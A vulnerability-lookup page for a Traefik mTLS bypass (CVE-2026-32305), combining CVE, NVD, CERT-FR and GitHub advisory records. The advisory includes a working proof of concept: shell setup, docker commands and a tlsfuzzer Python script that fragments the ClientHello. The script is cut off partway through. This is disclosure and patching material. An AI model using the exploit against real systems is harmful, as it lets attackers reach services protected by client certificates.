Vulnerability-Lookup

CVE-2026-32305 (GCVE-0-2026-32305)

Vulnerability from cvelistv5 – Published: 2026-03-20 10:01 – Updated: 2026-03-20 13:45

Title

Traefik mTLS bypass via fragmented ClientHello SNI extraction failure

Summary

Traefik is an HTTP reverse proxy and load balancer. Versions 2.11.40 and below, 3.0.0-beta1 through 3.6.11, and 3.7.0-ea.1 are vulnerable to mTLS bypass through the TLS SNI pre-sniffing logic related to fragmented ClientHello packets. When a TLS ClientHello is fragmented across multiple records, Traefik's SNI extraction may fail with an EOF and return an empty SNI. The TCP router then falls back to the default TLS configuration, which does not require client certificates by default. This allows an attacker to bypass route-level mTLS enforcement and access services that should require mutual TLS authentication. This issue is patched in versions 2.11.41, 3.6.11 and 3.7.0-ea.2.

Severity ?

7.8 (High)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N

CWE

CWE-287 - Improper Authentication
CWE-1188 - Insecure Default Initialization of Resource

Assigner

GitHub_M

References

URL

Tags

	https://github.com/traefik/traefik/security/advis…	x_refsource_CONFIRM
	https://github.com/traefik/traefik/releases/tag/v…	x_refsource_MISC
	https://github.com/traefik/traefik/releases/tag/v3.6.11	x_refsource_MISC
	https://github.com/traefik/traefik/releases/tag/v…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	traefik	traefik	Affected: < 2.11.41 Affected: >= 3.0.0-beta1, < 3.6.11 Affected: >= 3.7.0-ea.1, < 3.7.0-ea.2

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-32305",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-20T13:44:56.647317Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-20T13:45:04.503Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "traefik",
          "vendor": "traefik",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 2.11.41"
            },
            {
              "status": "affected",
              "version": "\u003e= 3.0.0-beta1, \u003c 3.6.11"
            },
            {
              "status": "affected",
              "version": "\u003e= 3.7.0-ea.1, \u003c 3.7.0-ea.2"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Traefik is an HTTP reverse proxy and load balancer. Versions 2.11.40 and below, 3.0.0-beta1 through 3.6.11, and 3.7.0-ea.1 are vulnerable to mTLS bypass through the TLS SNI pre-sniffing logic related to fragmented ClientHello packets. When a TLS ClientHello is fragmented across multiple records, Traefik\u0027s SNI extraction may fail with an EOF and return an empty SNI. The TCP router then falls back to the default TLS configuration, which does not require client certificates by default. This allows an attacker to bypass route-level mTLS enforcement and access services that should require mutual TLS authentication. This issue is patched in versions 2.11.41, 3.6.11 and 3.7.0-ea.2."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "HIGH",
            "subIntegrityImpact": "HIGH",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-287",
              "description": "CWE-287: Improper Authentication",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-1188",
              "description": "CWE-1188: Insecure Default Initialization of Resource",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-20T10:01:13.620Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/traefik/traefik/security/advisories/GHSA-wvvq-wgcr-9q48",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/traefik/traefik/security/advisories/GHSA-wvvq-wgcr-9q48"
        },
        {
          "name": "https://github.com/traefik/traefik/releases/tag/v2.11.41",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/traefik/traefik/releases/tag/v2.11.41"
        },
        {
          "name": "https://github.com/traefik/traefik/releases/tag/v3.6.11",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/traefik/traefik/releases/tag/v3.6.11"
        },
        {
          "name": "https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2"
        }
      ],
      "source": {
        "advisory": "GHSA-wvvq-wgcr-9q48",
        "discovery": "UNKNOWN"
      },
      "title": "Traefik mTLS bypass via fragmented ClientHello SNI extraction failure"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-32305",
    "datePublished": "2026-03-20T10:01:13.620Z",
    "dateReserved": "2026-03-11T21:16:21.659Z",
    "dateUpdated": "2026-03-20T13:45:04.503Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-32305\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-20T11:18:02.360\",\"lastModified\":\"2026-03-20T13:37:50.737\",\"vulnStatus\":\"Undergoing Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Traefik is an HTTP reverse proxy and load balancer. Versions 2.11.40 and below, 3.0.0-beta1 through 3.6.11, and 3.7.0-ea.1 are vulnerable to mTLS bypass through the TLS SNI pre-sniffing logic related to fragmented ClientHello packets. When a TLS ClientHello is fragmented across multiple records, Traefik\u0027s SNI extraction may fail with an EOF and return an empty SNI. The TCP router then falls back to the default TLS configuration, which does not require client certificates by default. This allows an attacker to bypass route-level mTLS enforcement and access services that should require mutual TLS authentication. This issue is patched in versions 2.11.41, 3.6.11 and 3.7.0-ea.2.\"},{\"lang\":\"es\",\"value\":\"Traefik es un proxy inverso HTTP y balanceador de carga. Las versiones 2.11.40 e inferiores, 3.0.0-beta1 hasta 3.6.11, y 3.7.0-ea.1 son vulnerables a un bypass de mTLS a trav\u00e9s de la l\u00f3gica de pre-sniffing de SNI de TLS relacionada con paquetes ClientHello fragmentados. Cuando un ClientHello de TLS se fragmenta en m\u00faltiples registros, la extracci\u00f3n de SNI de Traefik puede fallar con un EOF y devolver un SNI vac\u00edo. El router TCP entonces recurre a la configuraci\u00f3n TLS predeterminada, que no requiere certificados de cliente por defecto. Esto permite a un atacante saltarse la aplicaci\u00f3n de mTLS a nivel de ruta y acceder a servicios que deber\u00edan requerir autenticaci\u00f3n TLS mutua. Este problema est\u00e1 parcheado en las versiones 2.11.41, 3.6.11 y 3.7.0-ea.2.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":7.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"NONE\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"HIGH\",\"subIntegrityImpact\":\"HIGH\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-287\"},{\"lang\":\"en\",\"value\":\"CWE-1188\"}]}],\"references\":[{\"url\":\"https://github.com/traefik/traefik/releases/tag/v2.11.41\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/traefik/traefik/releases/tag/v3.6.11\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/traefik/traefik/security/advisories/GHSA-wvvq-wgcr-9q48\",\"source\":\"security-advisories@github.com\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-32305\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-20T13:44:56.647317Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-20T13:44:59.946Z\"}}], \"cna\": {\"title\": \"Traefik mTLS bypass via fragmented ClientHello SNI extraction failure\", \"source\": {\"advisory\": \"GHSA-wvvq-wgcr-9q48\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 7.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"HIGH\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"HIGH\", \"vulnConfidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"traefik\", \"product\": \"traefik\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 2.11.41\"}, {\"status\": \"affected\", \"version\": \"\u003e= 3.0.0-beta1, \u003c 3.6.11\"}, {\"status\": \"affected\", \"version\": \"\u003e= 3.7.0-ea.1, \u003c 3.7.0-ea.2\"}]}], \"references\": [{\"url\": \"https://github.com/traefik/traefik/security/advisories/GHSA-wvvq-wgcr-9q48\", \"name\": \"https://github.com/traefik/traefik/security/advisories/GHSA-wvvq-wgcr-9q48\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/traefik/traefik/releases/tag/v2.11.41\", \"name\": \"https://github.com/traefik/traefik/releases/tag/v2.11.41\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/traefik/traefik/releases/tag/v3.6.11\", \"name\": \"https://github.com/traefik/traefik/releases/tag/v3.6.11\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2\", \"name\": \"https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Traefik is an HTTP reverse proxy and load balancer. Versions 2.11.40 and below, 3.0.0-beta1 through 3.6.11, and 3.7.0-ea.1 are vulnerable to mTLS bypass through the TLS SNI pre-sniffing logic related to fragmented ClientHello packets. When a TLS ClientHello is fragmented across multiple records, Traefik\u0027s SNI extraction may fail with an EOF and return an empty SNI. The TCP router then falls back to the default TLS configuration, which does not require client certificates by default. This allows an attacker to bypass route-level mTLS enforcement and access services that should require mutual TLS authentication. This issue is patched in versions 2.11.41, 3.6.11 and 3.7.0-ea.2.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-287\", \"description\": \"CWE-287: Improper Authentication\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-1188\", \"description\": \"CWE-1188: Insecure Default Initialization of Resource\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-20T10:01:13.620Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-32305\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-20T13:45:04.503Z\", \"dateReserved\": \"2026-03-11T21:16:21.659Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-20T10:01:13.620Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

CERTFR-2026-AVI-0333

Vulnerability from certfr_avis - Published: 2026-03-20 - Updated: 2026-03-20

De multiples vulnérabilités ont été découvertes dans Traefik. Elles permettent à un attaquant de provoquer une atteinte à la confidentialité des données et un contournement de la politique de sécurité.

Solutions

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

Impacted products

Vendor	Product	Description
Traefik	Traefik	Traefik versions v3.7.0-ea.x antérieures à v3.7.0-ea.2
Traefik	Traefik	Traefik versions v3.6.x antérieures à v3.6.11
Traefik	Traefik	Traefik versions antérieures à v2.11.41

References

Title

Publication Time

FKIE_CVE-2026-32305

Vulnerability from fkie_nvd - Published: 2026-03-20 11:18 - Updated: 2026-03-20 13:37

Severity ?

7.8 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/traefik/traefik/releases/tag/v2.11.41
	security-advisories@github.com	https://github.com/traefik/traefik/releases/tag/v3.6.11
	security-advisories@github.com	https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2
	security-advisories@github.com	https://github.com/traefik/traefik/security/advisories/GHSA-wvvq-wgcr-9q48

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Traefik is an HTTP reverse proxy and load balancer. Versions 2.11.40 and below, 3.0.0-beta1 through 3.6.11, and 3.7.0-ea.1 are vulnerable to mTLS bypass through the TLS SNI pre-sniffing logic related to fragmented ClientHello packets. When a TLS ClientHello is fragmented across multiple records, Traefik\u0027s SNI extraction may fail with an EOF and return an empty SNI. The TCP router then falls back to the default TLS configuration, which does not require client certificates by default. This allows an attacker to bypass route-level mTLS enforcement and access services that should require mutual TLS authentication. This issue is patched in versions 2.11.41, 3.6.11 and 3.7.0-ea.2."
    }
  ],
  "id": "CVE-2026-32305",
  "lastModified": "2026-03-20T13:37:50.737",
  "metrics": {
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 7.8,
          "baseSeverity": "HIGH",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "HIGH",
          "subIntegrityImpact": "HIGH",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "NONE",
          "vulnConfidentialityImpact": "NONE",
          "vulnIntegrityImpact": "NONE",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-20T11:18:02.360",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/traefik/traefik/releases/tag/v2.11.41"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/traefik/traefik/releases/tag/v3.6.11"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/traefik/traefik/security/advisories/GHSA-wvvq-wgcr-9q48"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-287"
        },
        {
          "lang": "en",
          "value": "CWE-1188"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-WVVQ-WGCR-9Q48

Vulnerability from github – Published: 2026-03-20 15:43 – Updated: 2026-03-20 15:43

Summary

Traefik has a Potential mTLS Bypass via Fragmented TLS ClientHello Causing Pre-SNI Sniff Fallback to Default Non-mTLS TLS Config

Details

Summary

There is a potential vulnerability in Traefik's TLS SNI pre-sniffing logic related to fragmented ClientHello packets.

When a TLS ClientHello is fragmented across multiple records, Traefik's SNI extraction may fail with an EOF and return an empty SNI. The TCP router then falls back to the default TLS configuration, which does not require client certificates by default. This allows an attacker to bypass route-level mTLS enforcement and access services that should require mutual TLS authentication.

Patches

https://github.com/traefik/traefik/releases/tag/v2.11.41
https://github.com/traefik/traefik/releases/tag/v3.6.11
https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2

For more information

If you have any questions or comments about this advisory, please open an issue.

Original Description ### Summary I found a behavior in Traefik's latest version where fragmented ClientHello packets can cause pre-sniff SNI extraction to not find the sni (EOF during sniff), which makes the TCP router fall back to default routing TLS config. If the default TLS config does not require client certificates (which is NoClientCert by default), the handshake succeeds without client auth, and the request is later routed to the HTTP Host which should be the protected with client certificate authentication (RequireAndVerifyClientCert tls config). ### Details The vulnerability is caused by a mismatch between where Traefik decides the TLS policy per host and where Go TLS can finally parse the full ClientHello. 1. In router.go, ServeTCP function calls clientHelloInfo. 2. clientHelloInfo peeks only one TLS record length (recLen) and then peeks exactly 5 + recLen bytes. It runs a temporary TLS parse on those bytes to extract the SNI. If ClientHello is fragmented, pre-sniff may return empty SNI (With fragmentation, first record can be incomplete for full ClientHello parsing). 4. clientHelloInfo still returns isTLS=true and empty SNI (it thinks there is no sni so it applies the default tls config (Which is by default NoClientCert which is permissive) 5. Real Go TLS handshake succeeds later without requiring the client cert. 6. Request is routed to the host that should have been protected. Conditions required for impact: - Route-level TLS options enforce mTLS for a host. - Default TLS config is weaker (noClientCert, which is the default default). - Pre-sniff fails to extract SNI (due to fragmented ClientHello). A workaround for this is to set the default tls config to RequireAndVerifyClientCert (but then you need to explicitly define for each permissive host the NoClientCert TLS config). A suggestion to fix is to parse the complete ClientHello before tls config decision (handle multi-record fragmentation). ### PoC

# prerequisites (ubuntu/debian, in rhel/fedora you need to run only the install command (dnf) but with "docker" instead of docker.io and podman will emulate it)
sudo apt update
sudo apt install -y docker.io openssl git python3 python3-venv
sudo usermod -aG docker "$USER"
# in debian/ubuntu run newgrp docker to apply the new group to the user

mkdir -p /tmp/traefik-frag-poc/{certs,config/dynamic}
cd /tmp/traefik-frag-poc

# CA
openssl genrsa -out certs/ca.key 4096
openssl req -x509 -new -nodes -key certs/ca.key -sha256 -days 3650 \
  -subj "/CN=PoC-CA" -out certs/ca.crt

# Server cert (whoami.home.arpa)
cat > certs/server.cnf <<'EOF_SERVER_CNF'
[req]
distinguished_name = dn
req_extensions = v3_req
prompt = no

[dn]
CN = whoami.home.arpa

[v3_req]
subjectAltName = @alt_names

[alt_names]
DNS.1 = whoami.home.arpa
EOF_SERVER_CNF

openssl genrsa -out certs/traefik.key 2048
openssl req -new -key certs/traefik.key -out certs/traefik.csr -config certs/server.cnf
openssl x509 -req -in certs/traefik.csr -CA certs/ca.crt -CAkey certs/ca.key -CAcreateserial \
  -out certs/traefik.crt -days 365 -sha256 -extensions v3_req -extfile certs/server.cnf

# Client cert (valid client)
openssl genrsa -out certs/client.key 2048
openssl req -new -key certs/client.key -subj "/CN=client1" -out certs/client.csr
openssl x509 -req -in certs/client.csr -CA certs/ca.crt -CAkey certs/ca.key -CAcreateserial \
  -out certs/client.crt -days 365 -sha256

cat > config/traefik.yml <<'EOF_TRAEFIK_CFG'
entryPoints:
  websecure:
    address: ":8443"

providers:
  file:
    directory: /etc/traefik/dynamic
    watch: true

log:
  level: DEBUG
EOF_TRAEFIK_CFG

cat > config/dynamic/dynamic.yml <<'EOF_DYNAMIC_CFG'
http:
  routers:
    whoami:
      rule: "Host(`whoami.home.arpa`)"
      entryPoints:
        - websecure
      service: whoami
      tls:
        options: mtls

  services:
    whoami:
      loadBalancer:
        servers:
          - url: "http://whoami:80"

tls:
  certificates:
    - certFile: /certs/traefik.crt
      keyFile: /certs/traefik.key

  options:
    mtls:
      clientAuth:
        caFiles:
          - /certs/ca.crt
        clientAuthType: RequireAndVerifyClientCert
EOF_DYNAMIC_CFG

docker network create traefik-poc


# run a whoami microservice for the bypass demonstration
docker run -d \
  --name whoami \
  --network traefik-poc \
  --restart unless-stopped \
  traefik/whoami:v1.11.0

docker run -d \
  --name traefik \
  --network traefik-poc \
  -p 8443:8443 \
  --restart unless-stopped \
  -v "$PWD/config/traefik.yml:/etc/traefik/traefik.yml:ro,Z" \
  -v "$PWD/config/dynamic:/etc/traefik/dynamic:ro,Z" \
  -v "$PWD/certs:/certs:ro,Z" \
  traefik:3.6.10 \
  --configFile=/etc/traefik/traefik.yml

# watch traefik logs to ensure everything was deployed correctly
docker logs traefik

# tlsfuzzer setup + frag client script

mkdir -p /tmp/testtlsfuzz
cd /tmp/testtlsfuzz
git clone https://github.com/tlsfuzzer/tlsfuzzer.git
cd tlsfuzzer

python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt

cat > frag_clienthello.py <<'EOF_FRAG_SCRIPT'
import argparse
import sys
import os

from tlsfuzzer.runner import Runner
from tlsfuzzer.messages import (
    Connect,
    SetMaxRecordSize,
    ClientHelloGenerator,
    CertificateGenerator,
    CertificateVerifyGenerator,
    ClientKeyExchangeGenerator,
    ChangeCipherSpecGenerator,
    FinishedGenerator,
    ApplicationDataGenerator,
    AlertGenerator,
)
from tlsfuzzer.expect import (
    ExpectServerHello,
    ExpectCertificate,
    ExpectServerKeyExchange,
    ExpectCertificateRequest,
    ExpectServerHelloDone,
    ExpectChangeCipherSpec,
    ExpectFinished,
    ExpectApplicationData,
    ExpectAlert,
    ExpectClose,
)
from tlsfuzzer.helpers import SIG_ALL
from tlslite.constants import (
    CipherSuite,
    ExtensionType,
    AlertLevel,
    AlertDescription,
    GroupName,
)
from tlslite.extensions import (
    SNIExtension,
    TLSExtension,
    SupportedGroupsExtension,
    SignatureAlgorithmsExtension,
    SignatureAlgorithmsCertExtension,
)
from tlslite.utils.keyfactory import parsePEMKey
from tlslite.x509 import X509
from tlslite.x509certchain import X509CertChain


class PrettyExpectApplicationData(ExpectApplicationData):
    def process(self, state, msg):
        super().process(state, msg)
        text = msg.write().decode("utf-8", errors="replace")
        head, _, body = text.partition("\r\n\r\n")
        print("\n=== HTTP RESPONSE ===")
        print(head)
        print()
        print(body)
        print("=== END HTTP RESPONSE ===\n")


def load_client_cert_and_key(cert_path, key_path):
    cert = None
    key = None

    if cert_path:
        text_cert = open(cert_path, "rb").read()
        if sys.version_info[0] >= 3:
            text_cert = str(text_cert, "utf-8")
        cert = X509()
        cert.parse(text_cert)

    if key_path:
        text_key = open(key_path, "rb").read()
        if sys.version_info[0] >= 3:
            text_key = str(text_key, "utf-8")
        key = parsePEMKey(text_key, private=True)

    return cert, key


def main():
    p = argparse.ArgumentParser()
    p.add_argument("--connect-host", default="127.0.0.1")
    p.add_argument("--port", type=int, default=8443)
    p.add_argument("--sni", default="whoami.home.arpa")
    p.add_argument("--record-size", type=int, default=512)
    p.add_argument("--padding-len", type=int, default=1200)
    p.add_argument("--expect-cert-request", action="store_true")
    p.add_argument("--client-cert-pem", default="")
    p.add_argument("--client-key-pem", default="")
    args = p.parse_args()

    cert, key = load_client_cert_and_key(args.client_cert_pem, args.client_key_pem)

    print(f"[DBG] cert_arg={args.client_cert_pem!r} key_arg={args.client_key_pem!r}")
    for p in [args.client_cert_pem, args.client_key_pem]:
        if p:
            print(f"[DBG] file={p} exists={os.path.exists(p)} size={os.path.getsize(p) if os.path.exists(p) else -1}")

    print(f"[DBG] cert_loaded={cert is not None} key_loaded={key is not None}")
    print(f"[DBG] bool(cert)={bool(cert) if cert is not None else None} bool(key)={bool(key) if key is not None else None}")


    if (args.client_cert_pem or args.client_key_pem) and not (cert and key):
        raise ValueError("Provide both --client-cert-pem and --client-key-pem")

    conv = Connect(args.connect_host, args.port)
    node = conv
    node = node.add_child(SetMaxRecordSize(args.record_size))

    ext = {
        ExtensionType.server_name: SNIExtension().create(bytearray(args.sni, "ascii")),
        ExtensionType.supported_groups: SupportedGroupsExtension().create(
            [GroupName.secp256r1, GroupName.ffdhe2048]
        ),
        ExtensionType.signature_algorithms: SignatureAlgorithmsExtension().create(SIG_ALL),
        ExtensionType.signature_algorithms_cert: SignatureAlgorithmsCertExtension().create(SIG_ALL),
        21: TLSExtension().create(21, bytearray(args.padding_len)),
    }

    ciphers = [
        CipherSuite.TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,
        CipherSuite.TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA,
        CipherSuite.TLS_DHE_RSA_WITH_AES_128_CBC_SHA,
        CipherSuite.TLS_EMPTY_RENEGOTIATION_INFO_SCSV,
    ]

    node = node.add_child(ClientHelloGenerator(ciphers, extensions=ext))
    node = node.add_child(ExpectServerHello())
    node = node.add_child(ExpectCertificate())
    node = node.add_child(ExpectServerKeyExchange())

    if args.expect_cert_request:
        node = node.add_child(ExpectCertificateRequest())

    node = node.add_child(ExpectServerHelloDone())

    if args.expect_cert_request and cert and key:
        node = node.add_child(CertificateGenerator(X509CertChain([cert])))
        node = node.add_child(ClientKeyExchangeGenerator())
        node = node.add_child(CertificateVerifyGenerator(key))
        node = node.add_child(ChangeCipherSpecGenerator())
        node = node.add_child(FinishedGenerator())
        node = node.add_child(ExpectChangeCipherSpec())
        node = node.add_child(ExpectFinished())
        req = bytearray(
            f"GET / HTTP/1.1\r\nHost: {args.sni}\r\nConnection: close\r\n\r\n".encode("ascii")
        )
        node = node.add_child(ApplicationDataGenerator(req))
        node = node.add_child(PrettyExpectApplicationData(output=sys.stdout))
        node = node.add_child(AlertGenerator(AlertLevel.warning, AlertDescription.close_notify))
        node = node.add_child(ExpectAlert())
        node.next_sibling = ExpectClose()

    elif args.expect_cert_request and not (cert and key):
        node = node.add_child(CertificateGenerator())
        node = node.add_child(ClientKeyExchangeGenerator())
